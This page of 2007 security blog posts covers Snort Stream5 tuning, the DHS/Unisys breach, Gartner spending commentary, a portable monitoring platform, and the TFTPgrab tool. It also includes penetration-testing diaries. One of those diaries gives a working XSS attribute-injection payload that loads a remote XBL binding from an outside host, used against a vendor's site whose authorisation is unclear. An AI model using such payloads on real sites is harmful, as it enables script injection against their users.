My 9th Snort Report on Snort's Stream5 and TCP overlapping fragments is now available online. From the start of the article:

It's important for value-added resellers and consultants to understand how Snort detects security events. Stream5 is a critical aspect of the inspection and detection equation. A powerful Snort preprocessor, Stream5 addresses several aspects of network-centric traffic inspection. Sourcefire calls Stream5 a "target-based" system, meaning it can perform differently depending on the directives passed to it. These directives tell Stream5 to inspect traffic based on its understanding of differences of behavior in TCP/IP stacks. However, if Stream5 isn't configured properly, customers may end up with a Snort installation that is running but not providing much real value. In this edition of Snort Report I survey a specific aspect of Stream5, found in Snort 2.7.x and 2.8.x.
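
For orientation, the target-based directives look roughly like this in snort.conf. This is a hedged example from the Snort 2.7/2.8 era, so check the manual for your exact version before copying it:

# Track TCP sessions and bound the session table.
preprocessor stream5_global: track_tcp yes, max_tcp 8192

# "policy" is the target-based part: reassemble the way the monitored
# hosts' TCP/IP stacks would (e.g. first, last, bsd, linux, windows).
preprocessor stream5_tcp: policy windows, ports client 21 23 25 80 110 143 443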

I'm working on the next Snort Report, which will look at new features in Snort 2.8.

Can Your Machine Be Hacked?

Last night I received an email from Rich Mclver, who gave me a link to publish. Basically, in his post he provides users with ideas on how to secure holes in their PCs. There are 12 tests, all of which give a rough idea of how to secure your machine. Well, I would say it is a good start for those who want to start learning about security overall. Check it out:

http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/

The Hacka Man

Thursday, 27 September 2007

Blueinfy.com

Want to know more about Web 2.0 hacking?
Want to have free Web 2.0 auditing tools and articles?
Want to know more about web security and hacking?

You will have to check out Blueinfy.com; it is definitely a site worth visiting, with great in-depth articles and simple yet easily understandable presentation slides that will make you hungry for more. The founder is none other than Shreeraj Shah, an ex-employee of Foundstone USA. Google him and you will know how powerful he is :)

The Hacka Man

XSS on a vendor's website

I am still testing the application for flaws. However, it is so secure that I can't do a single thing. In the end, I ended up testing a vendor's site for XSS. The vendor did a good job of escaping the < and > characters, and the injected <SCRIPT>alert(2)</SCRIPT> came back escaped when I viewed the source code. I was dejected, as I knew there was something more I could do. A few minutes later .mario came online and I told him about my problem. Immediately, he came up with a trick that allows the XSS to happen. So in the end I entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a=" into one of the form fields: the leading " closes the value attribute, and the injected style attribute loads a Firefox XBL binding via -moz-binding. When I viewed the source code, it was totally injected! This is what the source code displayed:

[input name="TxnEnd_Param" value="" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="" type="hidden"]

Thank you .mario, you helped me understand XSS a lot more.

The Hacka Man

Tuesday, 25 September 2007

DHS Debacle

Thanks to the Threat Level story FBI Investigates DHS Contractor for Failing to Protect Gov't Computer I learned of the Washington Post story Contractor Blamed in DHS Data Breaches:

The FBI is investigating a major information technology firm with a $1.7 billion Department of Homeland Security contract after it allegedly failed to detect cyber break-ins traced to a Chinese-language Web site and then tried to cover up its deficiencies, according to congressional investigators.

At the center of the probe is Unisys Corp., a company that in 2002 won a $1 billion deal to build, secure and manage the information technology networks for the Transportation Security Administration and DHS headquarters. In 2005, the company was awarded a $750 million follow-on contract.

On Friday, House Homeland Security Committee Chairman Bennie Thompson (D-Miss.) called on DHS Inspector General Richard Skinner to launch his own investigation.

As part of the contract, Unisys, based in Blue Bell, Pa., was to install network-intrusion detection devices on the unclassified computer systems for the TSA and DHS headquarters and monitor the networks. But according to evidence gathered by the House Homeland Security Committee, Unisys's failure to properly install and monitor the devices meant that DHS was not aware for at least three months of cyber-intrusions that began in June 2006.

Through October of that year, Thompson said, 150 DHS computers -- including one in the Office of Procurement Operations, which handles contract data -- were compromised by hackers, who sent an unknown quantity of information to a Chinese-language Web site that appeared to host hacking tools.

The contractor also allegedly falsely certified that the network had been protected to cover up its lax oversight, according to the committee.

"For the hundreds of millions of dollars that have been spent on building this system within Homeland, we should demand accountability by the contractor," Thompson said in an interview. "If, in fact, fraud can be proven, those individuals guilty of it should be prosecuted."


Wow. This is huge. I cannot remember any case like it. So what happened?

In the 2006 attacks on the DHS systems, hackers often took over computers late at night or early in the morning, "exfiltrating" or copying and sending out data over hours -- in one case more than five hours, according to evidence collected by the committee.

Five hours. That indicates one means of detecting this sort of activity: time-based analysis of session records.
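
As an illustration of what I mean, here is a minimal sketch in Python (my own, with made-up thresholds) that flags long-lived, off-hours sessions with significant outbound volume:

from datetime import datetime, timedelta

def suspicious(start, end, bytes_out,
               min_duration=timedelta(hours=2), min_bytes=10000000):
    # Late-night or early-morning start, long duration, lots of data out.
    off_hours = start.hour < 6 or start.hour >= 22
    return off_hours and (end - start) > min_duration and bytes_out > min_bytes

# A five-hour 2 a.m. session pushing 50 MB out would be flagged:
print(suspicious(datetime(2006, 7, 1, 2, 0), datetime(2006, 7, 1, 7, 15), 50000000))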

In July 2006, a Unisys employee detected a possible intrusion but "downplayed it and low-level DHS security managers ignored it," the committee aide said.

It was not until Sept. 27, 2006, that two DHS systems managers noticed that their machines had been accessed with a hacking tool.

Unisys information technology employees began a probe and determined that the break-in affected more computers. They discovered that it reached back as far as June 13 that year and had continued through at least Oct. 1, eventually reaching 150 computers.

Among the security devices Unisys had been hired to install and monitor were seven "intrusion-detection systems," which flag suspicious or unauthorized computer network activity that may indicate a break-in. The devices were purchased in 2004, but by June 2006 only three had been installed -- and in such a way that they could not provide real-time alerts, according to the committee. The rest were gathering dust in DHS storage closets and under desks in their original packaging, the aide said.
(emphasis added)

This explains a lot!

Let's finish with this thought:

A Unisys spokeswoman, Lisa Meyer... said that Unisys has provided DHS "with government-certified and accredited security programs and systems, which were in place throughout 2006 and remain so today."

Exactly. C&A has absolutely zero operational security value, as I wrote in FISMA 2006 Scores.

I commend the Congressional committee tracking this problem and I welcome future reporting. I would love to be the expert witness in any trial between the government and Unisys, but that is outside the scope of my current employment!

2 Factor Authentication Update

I don't believe this: I basically can't do SQL injection, CSRF or XSS! Everything I want to inject is either encrypted, or, if I inject a simple character like ", I get "service unavailable". This application can be considered very secure in terms of encryption and of a good standard when weighed against the OWASP Top Ten. Even if I enter a value as simple as 10, it gets encrypted into this:

Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tU

I am running outta ideas. Tell me, what more can I do??

The Hacka Man

Monday, 24 September 2007

2 Factor Authentication Day 2

Damn, it's getting tough! Have you guys ever seen a 6-digit password with an encrypted string this long?

ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120
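
One thing the length alone tells me, sketched out in Python (the inference is my guess, not something I have confirmed):

token_hex_len = 256             # the full string above is 256 hex characters
num_bytes = token_hex_len // 2  # 128 bytes
num_bits = num_bytes * 8        # 1024 bits
print(num_bytes, "bytes =", num_bits, "bits")
# A fixed 1024-bit blob for a 6-digit password would be consistent with
# something like a 1024-bit RSA encryption of the credential rather than a hash.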

Well, is there nothing more I can do? I dunno, still thinking?????

The Hacka Man

2 Factor Authentication?

Well, if you guys are asking why I haven't been updating my blog, I can only say that there is so much to be done at work, and of course I have been reading a lot about Rsnake's XSS exploits and defence. I have been doing a lot of project management and technical work for my new company. I love my current company because of the flexible hours, nice colleagues and of course a very nice boss who is willing to listen to suggestions.

Well, back to the main topic: I have been assigned to hack an application with 2 factor authentication. Damn, all I can say is that it is very secure in terms of the randomness of its session IDs, hidden fields and encryption. There is no way I can break the application's login page, and the only thing I found is a jar file with lots of class files inside. I know I could use a Java decompiler like jad to get the source code, but I did not, because I am concentrating on finding vulnerabilities. Hmz... I will continue with part 2 tomorrow. Firefox is a very cool tool for web hacking. Install the following extensions, guys:

1. DOM Inspector
2. LiveHTTP Headers
3. Tamper Data
4. Modify Header
5. Firebug
6. Greasemonkey with XSS Assistant and Post Intercepter

The Hacka Man

Saturday, 22 September 2007

Review of Snort IDS and IPS Toolkit and One Prereview

Amazon.com just posted my three star review of Snort IDS and IPS Toolkit. From the review:

Syngress published "Snort 2.0" in Mar 03, and I gave it a four star review in Jul 03. Syngress followed with "Snort 2.1" in May 04, and I gave it a four star review in Jul 04. I recommend reading those reviews, since the latest edition -- "Snort IDS and IPS Toolkit" (SIAIT) -- makes many of the same mistakes as its predecessors. Worse, it includes material that was already outdated in BOTH previous editions. If you absolutely must buy a book on Snort, this edition is your only real choice. Otherwise, I would stick with the manual and online articles.

SIAIT looks impressive page-wise, but it suffers from the multiple-author, no-editing, rush-to-production problems unfortunately inherent in many Syngress titles. One would think that including many contributing authors (11, apparently) would make for a strong book. In reality, the book contributes very little beyond what appears in "Snort 2.1," despite the fact that "only" chapters 8, 10, 11, and 13 appear to be repeats or largely rehashes of older material. Comparing to "Snort 2.1," these compare to old chapters 7, 10, 12, and 11, respectively.

The absolute worst part of this book is the re-introduction of all the outdated information in chapters 8 and 10. It is 2007 and we are STILL reading on p 353 that XML output is "our favorite and relatively new logging format" and on p 367 that "Unified logs are the future of Snort reporting." (I cited both of these as being old news in Jul 04!) I should note that these chapters are not entirely duplicates; if you compare output such as that on page 335 of "Snort 2.1" with page 365 in SIAIT you'll see the author replaced the original 2003 timestamps with 2006! This is the height of lazy publishing. Chapter 10 features similar tricks, where traffic is the same except for global replacements of IP addresses and timestamps; notice the ACK numbers are still the same and the test uses Snort 1.8.


You can read my reviews of Snort 2.1 and Snort 2.0 for reference. If I see Syngress publish another Snort book based on this line of material, I won't bother next time.

On a more positive note, thank you to O'Reilly for sending me a review copy of Security Power Tools. This book looks like it deserves a grunt from Tim the Toolman Taylor. The book appears to have lots of useful information, although why in Pete's name is there a chapter (11) on BO2k? Let it die, already. It's 2007.

Friday, 21 September 2007

Pescatore on Security Trends

The article Spend less on IT security, says Gartner caught my attention. Comments are inline, and my apologies if Mr. Pescatore was misquoted.

Organisations should aim to spend less of their IT budgets on security, Gartner vice-president John Pescatore told the analyst firm’s London IT Security Summit on 17 September.

In a keynote speech, he said that retailers typically spend 1.5% of revenue trying to prevent crime, then still lose a further 1.5% through shoplifting and staff theft, costing 3% in total.


Digital security is not comparable to shoplifting. It is not feasible for shoplifters to steal every asset from a company in a matter of seconds, or subtly alter all of the assets so as to render them untrustworthy or even dangerous. I would also hardly consider shoplifters an "intelligent adversary."

But Gartner’s research suggests that the average organisation spends 5% of its IT budget on security, even with disaster recovery and business continuity work excluded, and IT managers are tired of requests for more. Security has dropped from first (in 2005) to sixth (in 2007) in the firm’s annual survey of chief information officers’ technical concerns.

I concur with this, especially with regard to IPS and SIM/SEM/SIEM. Managers spent a lot of money several years ago on this technology and they are "still getting hacked."

Pescatore said that managers are not impressed by the claim that “security is a journey” without a destination. “Can you imagine, ‘profit is a journey’?” he asked, pointing out that other areas of IT are often able to offer their organisations more functionality for less money, or some other kind of business benefit.

This could be the single greatest problem I see in this whole article. Please tell me how profit is not a journey, unless the goal of your company is to 1) enjoy a really awesome quarter (or year, etc.) and then disappear; or 2) dash for the acquisition line and then cash out. The operative word in business is not profit but profitability. A stock price reflects future value. Turning strictly to the security aspect, I'd like to hear Mr. Pescatore or his upset managers describe when security can end. This statement is clearly troubling.

Growing efficiencies could be possible for IT security too: “I really don’t think most of us need more money and people,” he said, if organisations moved to a model he called ‘Security 3.0’. In this, IT security would anticipate threats, rather than fight them after they hit.

This is another poor statement. As I wrote in Attacker 3.0, security is at 1.0 (and that's being generous) while we approach Web 2.0 and fight Attacker 3.0. No one is ahead of the threat and no one could ever be. Advanced attackers are digital innovators. By definition they cannot be anticipated.

Pescatore said ways to prevent problems rather than fight them include buying and building secure systems, which means considering security during procurement and development, and rejecting products which are not adequately protected. This might mean spending more initially, but prevention is cheaper than cure.

This is all true and sounds nice, but it has never worked and will never work. Everyone is so excited to see the government finally working with Microsoft to secure the operating system, but at this point who really cares? It's all about applications now.

In response to a question, Pescatore dismissed the idea that insider threats are growing: he believes that attacks generated by malicious insiders are stable at 20-25%. Half come from mistakes made by insiders, while around 30% of attacks are made solely by outsiders, the majority of whom are cybercriminals.

I love to see the insider threat fans squashed.

Let's hear another view on this speech from Security to drop out of CIO spending top ten:

Security pros need to get more proactive about dealing with threats and adopt strategies to persuade their colleagues to take on security spending as part of their projects, according to analysts Gartner.

The changes in roles for security specialists come as the internet security market enters what Gartner described as the third major stage of its development.

Always a sector of the industry that relishes one-upmanship, the Web 2.0 phenomenon is accompanied by Security 3.0. The first stage of security, according to Gartner, belongs to the time of centralised planning and the mainframe. The widespread use of personal computers ushered in reactive security to deal with threats such as malicious computer hackers and worms (security 2.0). Security 3.0 is characterised by an era of more proactive security, according to John Pescatore, a VP and distinguished analyst at Gartner.

Security 3.0 involves an approach to risk management that applies security resources appropriately to meet business objectives. Instead of bolting security on as an afterthought, Security 3.0 integrates compliance, risk assessment and business continuity into every process and application.

For security managers the process involves persuading their counterparts in, for example, application development to include security functions in their projects. In this way security expenditure in real terms can go up even as security budgets (as such) stay flat or modestly increase. Security budgets freed from firefighting problems can then be invested with a view to managing future risks.

"Even a reduced security budget does not necessarily mean reducing security-related spending," Pescatore said. "Security professionals need to think in terms of changing who pays for security controls," so they can "move upstream" and spend their time and resources on more demanding projects, he added.


Now this makes sense to me. I do not understand why security as it relates to applications should be treated separately from those applications. Security should be another consideration that is built into the application, along with performance and other features. Security as an operational discipline doesn't need to be integrated into every other business function, but including security natively in projects is the right way forward.

Gartner predicts that security spending will rise 9.3 per cent in 2007, but will drop out of the first ten spending priorities for CIOs for the first time since the prolific internet worms of 2003. Malware threats these days have evolved into targeted attacks featuring malware payloads designed not to draw attention to themselves.

This "run silent, run deep" malware means that security is a less high-profile function than before, as improving business processes and reducing costs become the pre-eminent priorities for IT directors.


This is true and it is killing us. Security got plenty of attention when managers could see the sky was falling. In other words, when their email and their boss' email was inaccessible or filled with spam and malware, or they couldn't surf the Web because their pipe was filled by DoS traffic, security failures couldn't be ignored. Now enterprises are silently and completely owned, and no one cares.

Finally, a few more thoughts from Managing IT risk in unchartered waters of "Security 3.0":

Gartner research suggests that throwing money at security is not working. At the summit, the firm said that there is no correlation between security spending and the security level of a system. The firm added that progress in security should see a reduction in security spending, not an increase.

I agree with this. The reasons are complex, but a major problem is that managers have no idea if the money they apply makes any difference in their security posture. To the degree they measure at all, they measure inputs of questionable value and ignore the outputs. However, I don't see how Gartner can say that success in security means spending falls. This is not the so-called "war on drugs," where a rise in the price of a drug means interdiction could be restricting supply. Security spending is determined by management; it is not an output of the security process.

Overall, it must have been an interesting speech! I fear the take-away for managers will be the "spend less on security" and "employ fewer people" headlines. That may be appropriate if you know how spending and manpower affect security outputs, but that is not the case. I believe management is spending plenty of money on the wrong tools, and potentially on the wrong people, and that directing those resources to other functions would be more effective.

Tactical Network Security Monitoring Platform

I am working on both strategic and tactical network security monitoring projects. On the tactical side I have been looking for a platform that I can carry onto a plane and fit in the overhead compartment, or at the very least under the seat in front of me. Earlier in my career I used Shuttle and Hacom boxes, but I'm always looking for something better.

People often ask "Why don't you use a laptop?" Reasons to not use a laptop include:

  • Laptops don't have PCI, PCI-X or PCI Express slots to accommodate extra NICs, especially for fiber connections.

  • Laptops are not designed to run constantly.

  • Laptop storage is not as robust as server storage, since laptops usually accommodate up to two internal hard drives, with some capacity for external storage.

  • Laptops are consumer devices and not generally built for server-type operations.


Today I think I found the device I needed: the NextComputing NextDimension Pro. The specs are as follows:

  • Single dual-core 2.2 GHz AMD Opteron 275/940

  • 4 GB RAM (2 GB x 2, PC3200/400 MHz DDRAM)

  • Two Marvell Yukon 88E8052 Gigabit Ethernet

  • One NVIDIA nForce4 CK804 MCP9 Networking Adapter (Marvell 88E1111 Gigabit PHY)

  • Two 160 GB 7200 RPM SATA 2.5" Seagate Momentus HDDs connected to on-board four port SATA controller

  • Four 160 GB 7200 RPM SATA 2.5" Seagate Momentus HDDs connected to PCI-X four port SATA RAID controller

  • Four USB 2.0

  • Two external SATA ports

  • One RS232 serial port and one RS232 serial port with RS422/485 adaptor

  • DVD drive

  • Two PCI-X slots OR two PCI Express slots OR one PCI-X and one PCI Express; mine has one 16x PCI Express slot and one PCI-X full length slot.

  • Graphics out via Nvidia


I tried FreeBSD 7.0-CURRENT-200709-amd64-disc1.iso on this machine and it installed flawlessly. If you want to see dmesg output please visit Dmesgd courtesy of NYCBUG.

Check out the storage available. If I needed to, I could combine /nsm1 and /nsm2 into a single /nsm using gconcat(8); a sketch of that procedure follows the df output below.

$ df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/ad4s1a 989M 194M 716M 21% /
devfs 1.0K 1.0K 0B 100% /dev
/dev/ad4s1e 9.7G 24K 8.9G 0% /home
/dev/ad4s1f 77G 4.0K 71G 0% /nsm1
/dev/da0s1d 577G 4.0K 531G 0% /nsm2
/dev/ad4s1g 9.7G 12K 8.9G 0% /tmp
/dev/ad4s1d 39G 1.2G 34G 3% /usr
/dev/ad6s1d 144G 258K 133G 0% /var
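
For reference, here is a minimal sketch of how that gconcat(8) procedure might look, using the device names from the df output above. Treat it as an untested outline rather than something I have run on this box; newfs would destroy the existing /nsm1 and /nsm2 filesystems, so their data would have to be sacrificed or moved first:

# kldload geom_concat
# umount /nsm1 /nsm2
# gconcat label -v nsm /dev/ad4s1f /dev/da0s1d
# newfs /dev/concat/nsm   (creates a fresh filesystem on the concatenated device)
# mount /dev/concat/nsm /nsm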

I am really pleased FreeBSD 7.0 installs on this machine. I may try the i386 version at some point, but I hope to stick with the AMD64 version if possible.

Security Jersey Colors

I realized after my previous post that not everyone may be familiar with the "color" system used to designate various military security teams. I referenced a "red team" in my post NSA IAM and IEM Summary, for example.

I thought it might be helpful to post my understanding of these colors and to solicit feedback from anyone who could clarify these statements.


  • Red Team: A Red Team is an adversary simulation team. The Red Team attacks the asset to meet an objective. This activity is called penetration testing in the commercial world.

  • Blue Team: A Blue Team is a security posture assessment and evaluation team. The Blue Team determines the vulnerabilities and exposures of an enterprise. This activity is called vulnerability assessment in the commercial world.

  • White Team: A White Team (or usually a "White Cell") controls the environment during an exercise. The White Cell provides the framework in which the Red Team attacks friendly forces. (Note that in some situations the friendly forces are called the "Blue Team." This is not the same Blue Team that conducts vulnerability assessments and evaluations. Blue in this case is simply used to differentiate from Red.)

  • Green Team: The Green Team is usually a training group that helps the asset owners. Alternatively, the Green Team helps with long-term vulnerability and exposure remediation, as identified by the Blue Team. These descriptions are open for discussion because I haven't seen too many green team activities.


Did I miss any colors?

Tactical Traffic Assessment

When I wrote Extrusion Detection in 2004-5 I used the term Traffic Threat Assessment to describe a means of inspecting network traffic for signs of malicious activity. I differentiated among various assessments using this terminology.

  1. A vulnerability assessment identifies vulnerabilities and exposures in assets.

  2. A penetration test identifies at least one way that an adversary could exploit vulnerabilities and exposures to compromise a target or satisfy a related objective.

  3. A traffic threat assessment identifies traffic that indicates a network has already been compromised.


The customer's goal determined which of these actions I performed.

I was never really comfortable with the term "traffic threat assessment," so from now on I'm going to use Tactical Traffic Assessment. The new term nicely differentiates between a short-term, focused, tactical effort and a long-term, enterprise-wide, strategic program like Network Security Monitoring.

Tactical Traffic Assessment drops the "threat assessment" language, since "threat assessment" is more about characterizing the capabilities and intentions of an adversary than about determining whether he has compromised the enterprise.

Tactical Traffic Assessment also leaves room for finding non-security issues like misconfigured devices or other troubleshooting-related network problems.

Wisdom from Ranum

The Face-Off article in the September 2007 Information Security Magazine contains a great closing thought by Marcus Ranum:

Will the future be more secure? It'll be just as insecure as it possibly can, while still continuing to function. Just like it is today.

"Continuing to function" is an interesting concept. The reason the "Internet" hasn't been destroyed by terrorists, organized crime, or others is that doing so would cut off a major communication and funding resource. Criminals and other adversaries have a distinct interest in keeping computing infrastructure working just well enough to exploit it.

Being "secure" is another wonderful idea. Marcus clearly shows that there is no secure -- i.e., there is no end game. None of us can retire "when our work is done." We will retire when we can hand off the problem to another generation.

Thursday, 20 September 2007

TFTPgrab

While I was teaching and speaking at conferences, I usually discussed research and coding projects with audience members. One of my requests involved writing a tool to reconstruct TFTP sessions. Because TFTP uses UDP, files transferred using TFTP cannot be rebuilt using Wireshark, TCPFlow, and similar tools. I was unaware of any tool that could rebuild TFTP transfers, despite the obvious benefit of being able to do so.

Today I was very surprised to receive an email from Gregory Fleischer, who directed me to his new tool TFTPgrab. He saw my ShmooCon talk earlier this year, heard my plea, and built a TFTP file transfer reconstruction tool! I downloaded and compiled it on FreeBSD 6.2 without incident, and here is how I tested it.

I ensured a TFTP server was running on a FreeBSD system. I identified a small .gif to upload and download using TFTP.
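
If you need to stand up tftpd on FreeBSD yourself, the following is a rough sketch of the usual inetd-based setup. The tftp line ships commented out in the stock /etc/inetd.conf; /tftpboot is the conventional served directory, and you may need to adjust permissions there for uploads to succeed:

# mkdir -p /tftpboot
# echo 'inetd_enable="YES"' >> /etc/rc.conf
# vi /etc/inetd.conf   (uncomment the tftp line, shown below)
tftp   dgram   udp   wait   root   /usr/libexec/tftpd   tftpd -l -s /tftpboot
# /etc/rc.d/inetd start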

richard@neely:~$ md5sum rss.gif
01206e1a6dcfcb7bfb55f3d21700efd3 rss.gif
richard@neely:~$ tftp
tftp> binary
tftp> trace
Packet tracing on.
tftp> verbose
Verbose mode on.
tftp> connect hacom
tftp> put rss.gif
putting rss.gif to hacom.taosecurity.com:rss.gif [octet]
sent WRQ <file=rss.gif, mode=octet>
received ACK <block=0>
sent DATA <block=1, 451 bytes>
received ACK <block=1>
Sent 451 bytes in 0.0 seconds [inf bits/sec]

After the file was uploaded to the TFTP server I changed to /tmp, then downloaded the copy on the TFTP server.

richard@neely:~$ cd /tmp
richard@neely:/tmp$ tftp
tftp> verbose
Verbose mode on.
tftp> binary
mode set to octet
tftp> connect hacom
tftp> get rss.gif
getting from hacom.taosecurity.com:rss.gif to rss.gif [octet]
Received 451 bytes in 0.0 seconds [inf bits/sec]
tftp> quit
richard@neely:/tmp$ md5sum rss.gif
01206e1a6dcfcb7bfb55f3d21700efd3 rss.gif

Notice the file I uploaded is exactly the same as the downloaded version, per the MD5 hashes.

The captured traffic held one surprise.

I will have to be honest here and say that I expected to see everything happening over port 69 UDP. I didn't expect to see the server choose another port, but it's completely within spec and normal according to RFC 1350. Before commenting with a lecture on how TFTP works, please be aware that I read the relevant section of the RFC and understand transaction IDs and how ports are chosen.
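
To make the port behavior concrete, here is a rough schematic of the put session. The client and server ports are taken from the session endpoints TFTPgrab reports below; the initial request to port 69 is inferred from RFC 1350 rather than copied from the trace:

192.168.2.101:32979 -> 10.1.13.4:69      WRQ rss.gif (client picks TID 32979)
192.168.2.101:32979 <- 10.1.13.4:49324   ACK block 0 (server picks TID 49324)
192.168.2.101:32979 -> 10.1.13.4:49324   DATA block 1 (451 bytes)
192.168.2.101:32979 <- 10.1.13.4:49324   ACK block 1

After the first packet, everything rides on the two ephemeral ports, which is part of why TCP-oriented reassembly tools cannot rebuild these transfers.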

I copied the trace to a system with TFTPgrab and let it process the trace.

hacom:/root/tftpgrab-0.2# ./tftpgrab -h
Usage: ./tftpgrab [OPTION]... [-r FILE] [EXPRESSION]
Reconstruct TFTP file contents from PCAP capture file.
With no FILE, or when FILE is -, read standard input.
-r PCAP file to read
-f overwrite existing files
-c print TFTP file contents to console
-E exclude TFTP filename when reconstructing
-v print verbose TFTP exchanges (repeat up to three times)
-X dump TFTP packet contents
-B check packets for bad checksums
-d specify debugging level
hacom:/root/tftpgrab-0.2# ./tftpgrab -r /tmp/tftpgrab.lpc
reading from file /tmp/tftpgrab.lpc, using datalink type EN10MB (Ethernet)
hacom:/root/tftpgrab-0.2# file 192*
192.168.002.101.32979-010.001.013.004.49324-rss.gif: GIF image data, version 89a, 36 x 14
192.168.002.101.32980-010.001.013.004.53366-rss.gif: GIF image data, version 89a, 36 x 14
hacom:/root/tftpgrab-0.2# md5 192*
MD5 (192.168.002.101.32979-010.001.013.004.49324-rss.gif) = 01206e1a6dcfcb7bfb55f3d21700efd3
MD5 (192.168.002.101.32980-010.001.013.004.53366-rss.gif) = 01206e1a6dcfcb7bfb55f3d21700efd3

As you can see, TFTPgrab pulled two files out of the trace and saved them to disk. They are identical to each other and to the original.

Thanks again to Gregory Fleischer for writing TFTPgrab!

Radiation Detection Mirrors Intrusion Detection

Yesterday I heard part of the NPR story Auditors, DHS Disagree on Radiation Detectors. I found two Internet sources, namely DHS fudged test results, watchdog agency says and DHS 'Dry Run' Support Cited, and I looked at Combating Nuclear Smuggling: Additional Actions Needed to Ensure Adequate Testing of Next Generation Radiation Detection Equipment (.pdf), a GAO report.

The report begins by explaining why it was written:

The Department of Homeland Security’s (DHS) Domestic Nuclear Detection Office (DNDO) is responsible for addressing the threat of nuclear smuggling. Radiation detection portal monitors are key elements in our national defenses against such threats. DHS has sponsored testing to develop new monitors, known as advanced spectroscopic portal (ASP) monitors.

In March 2006, GAO recommended that DNDO conduct a cost-benefit analysis to determine whether the new portal monitors were worth the additional cost. In June 2006, DNDO issued its analysis. In October 2006, GAO concluded that DNDO did not provide a sound analytical basis for its decision to purchase and deploy ASP technology and recommended further testing of ASPs. DNDO conducted this ASP testing at the Nevada Test Site (NTS) between February and March 2007.

GAO's statement addresses the test methods DNDO used to demonstrate the performance capabilities of the ASPs and whether the NTS test results should be relied upon to make a full-scale production decision.

GAO recommends that, among other things, the Secretary of Homeland Security delay a full-scale production decision on ASPs until all relevant studies and tests have been completed, and determine in cooperation with U.S. Customs and Border Protection (CBP), the Department of Energy (DOE), and independent reviewers, whether additional testing is needed.
(emphasis added)

Notice that a risk analysis was not done. Rather, a cost-benefit analysis was done. This is consistent with the approach I liked in the book Managing Cybersecurity Resources, although in that book the practicalities of assigning certain values made the exercise fruitless. Here the cost-benefit approach has a better chance of working.

Next the report summarizes the findings:

Based on our analysis of DNDO’s test plan, the test results, and discussions with experts from four national laboratories, we are concerned that DNDO’s tests were not an objective and rigorous assessment of the ASPs’ capabilities. Our concerns with the DNDO’s test methods include the following:

  • DNDO used biased test methods that enhanced the performance of the ASPs. Specifically, DNDO conducted numerous preliminary runs of almost all of the materials, and combinations of materials, that were used in the formal tests and then allowed ASP contractors to collect test data and adjust their systems to identify these materials.

    It is highly unlikely that such favorable circumstances would present themselves under real world conditions.

  • DNDO’s NTS tests were not designed to test the limitations of the ASPs’ detection capabilities -- a critical oversight in DNDO’s original test plan. DNDO did not use a sufficient amount of the type of materials that would mask or hide dangerous sources and that ASPs would likely encounter at ports of entry.

    DOE and national laboratory officials raised these concerns to DNDO in November 2006. However, DNDO officials rejected their suggestion of including additional and more challenging masking materials because, according to DNDO, there would not be sufficient time to obtain them based on the deadline imposed by obtaining Secretarial Certification by June 26, 2007.

    By not collaborating with DOE until late in the test planning process, DNDO missed an important opportunity to procure a broader, more representative set of well-vetted and characterized masking materials.

